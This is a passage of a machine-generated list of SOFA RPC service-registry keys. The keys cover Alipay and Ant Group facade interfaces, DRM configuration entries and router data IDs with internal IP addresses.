T_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmarket.service.UserActivityInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.loadcenter.facade.BaseLineManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:gray@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.XPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.128.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.cacheKeyForLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.ipay.ihkprod.common.service.facade.promotion.point.api.PointAuthOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.voting.VotingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantcore.common.service.facade.annotation.api.StandardLibraryDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antmetadata#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.ufe.common.service.ServiceBeanMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.BizCallbackRoleQueryForClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.SceneSolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.shopminiapp.facade.api.query.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.AntPassportSwitcher.antPassportMaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.offer.ProdOfferRegionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.TreeTravelDRMEStrategy.huffmanStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.45.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.iotcore.api.RrpcConfigApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.atd:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gpfnfiveaccount.facade.api.AccountDebitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityBaseGZFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.userview.UvLabelSubscribeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:mmtcaftscmdproc#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pccontractprod.common.service.facade.admin.api.CacheAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.ChannelRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.interest.InterestIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algoevaluator.common.service.FeedBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.MsgRemindSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.biz.shared.biz.label.SubjectLabelService:1.0:opensupport_sharedSubjectLabelService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.PrizeSendOrderCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.datasync.express.service.ExpressDataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zappinfo.facade.query.MultiContainerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.TagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamScheduleApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.extension.service.facade.api.MerchantActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_YDATABUS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:sffgroup-archimedes@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.api.AcwMerchantPlatformFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.common.api.TransCacheConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.comment.CommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-zongyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:semantictest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskConfigQueryService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.common.service.facade.MbillSpecialCustomerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.fundtrans.FundtransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.pushToDataBus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.product.AutoMktProductPipelineFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:antefi_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.hyp.HypCheckOperatorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:microloan_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.common.user.service.ChainNodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cscheck.service.facade.api.QcRetryCcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:openpunish@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.spi.ActivityQueryServiceCallback:1.0:kbcateringprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.mpaas.sync.facade.api.LongLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardTableBasedAmountAggregationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.core.service.strategy.strategyruntime.StrategyRuntimeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.simulated.api.SatransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderCreateWithoutUserIdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.service.facade.istrace.UniformISTraceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginInfoHistoryServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:selfoptmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebpp.ChargeoffConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.outer.CalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:autofinanceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ldc.ordermng.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.imif.common.service.facade.v2.MerchantCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.discount.common.service.facade.DiscountApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.treasurebag.rule.service.CommonRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmMntListSimpleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.isUnsupportConditionThrowException,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zappinfo.zappinfo_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.mrch.common.service.view.api.BatchCommonViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.event.CommoditiesOffsetLimitControlEventHandlerForTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.switchToFindSameRateNewVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.waitersupport.facade.UserTradeAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:baasProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.SingleRiskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.workflow.WorkflowEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.staticrescore.common.service.facade.AppRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.shared.community.user.SecuUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.devicmtn.service.facade.DevicemtnTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifymng.service.facade.CreateTestAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.InstResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.TechnicalTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.CouponQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransNoTradeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_7_1_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-mrchprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassetpreference.api.facade.ResearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.AssetSentimentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.AlgoConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.LCSDashBoardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.sandboxhome.aqcPaas_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.PaymentPreConsultiveServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.HotwordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.risklib.common.mw.wtable.client.WTableWriteClient:1.0:event@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.instance.api.InstancetransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.district.DistrictServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.SidecarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.poscore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:antsecurity_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.account.PublicRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.account.admin.AccountAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zcache:name=com.alipay.zcache.tbase.yingxutestTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpcscgateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.GoldenDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.finsupport.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omoaidbase.common.service.facade.videocall.VideoCallManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:appstoreMessageAuditAppCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alinode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.ContentTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.VideoProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZEROXRISK#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.spring.SpringSteadilyHighFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.holdOrgInstChannelApi,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zcore.facade.face.ZFaceService:1.0:zcoregpuiot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:globalremitprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloansupport_writeoff_task_cancel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.agreement.facade.TerminalUserAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.esop.CustEsopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_UEMPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mservicesinspect_antProcessDeleteResultCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilesearch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.160.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppcore.facade.QueryChargeInstGeographyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.biz.service.impl.crmhome.CraftsmanMenuSpiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.huntshadow.HsObjectAreaRtService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsProjectSubscriptionInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.AssetAllowanceDetailRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.digestquery.common.service.ContinuousDigestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.biz.input.localtask.LocalTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:wealthapptwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.TenantComputeEngineConfigOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.MerchantAuditService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.cfin.cfcif.facade.customer.CustomerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agdscsalipay.common.service.facade.product.AgdsAdmitPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.comment.RewardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_CHANNELROUTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype.ActivityQueryConsumerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.SignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanRestructureConfigDrm.allInOneSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.bizindex.EtcBizIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.TransportDrmConfig.webHookTokenList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.graycore.changesdk.server.ChangeTaskService:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.promokernel.common.service.facade.api.CertificateSendOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appxcore.common.service.facade.api.view.ViewMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.starwish.drm.CoreDrm.cifQueryMaxMum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:pure_iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zappinfo:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.migrationActionMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifymng.service.facade.PartnerIdCertFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.datacheck.api.MiniAppDataCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa4RpcMosnClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.city.CityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.ant120.AlarmService:1.0:crmanAlarmService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linka.common.service.facade.statistic.StatisticFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.pub:1.0@XFIRE@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.LogicAppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:insrapbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.replaceAlipayLoadTestMarkBeforeSal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.himalayas.services.crm.facade.email.MailSendService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturemng.portable.sql.facade.FeatureMetaServingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcApplicationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:pcinstecoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.McommentCommonUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cpcenter.common.service.api.ServiceEventHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_CARDPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.65.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.config.api.SceneConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zappinfo.facade.query.AppInstanceGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.SceneDataSyncDrmImpl.syncDataUpdateJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.iopengw.service.facade.IMessageSenderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cssocial.common.service.facade.YqAlarmDataOutputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:graytest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.231.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilebc.common.service.facade.spi.RecommendFacade:1.0:peerpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdchecker.common.dal.dataquality.strategy.StrategyExplorerDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.74.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuprod.biz.service.gw.secucns.api.SceneRuleConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.company.facade.CompanyRuleProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilequest.common.service.facade.quest.QuestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF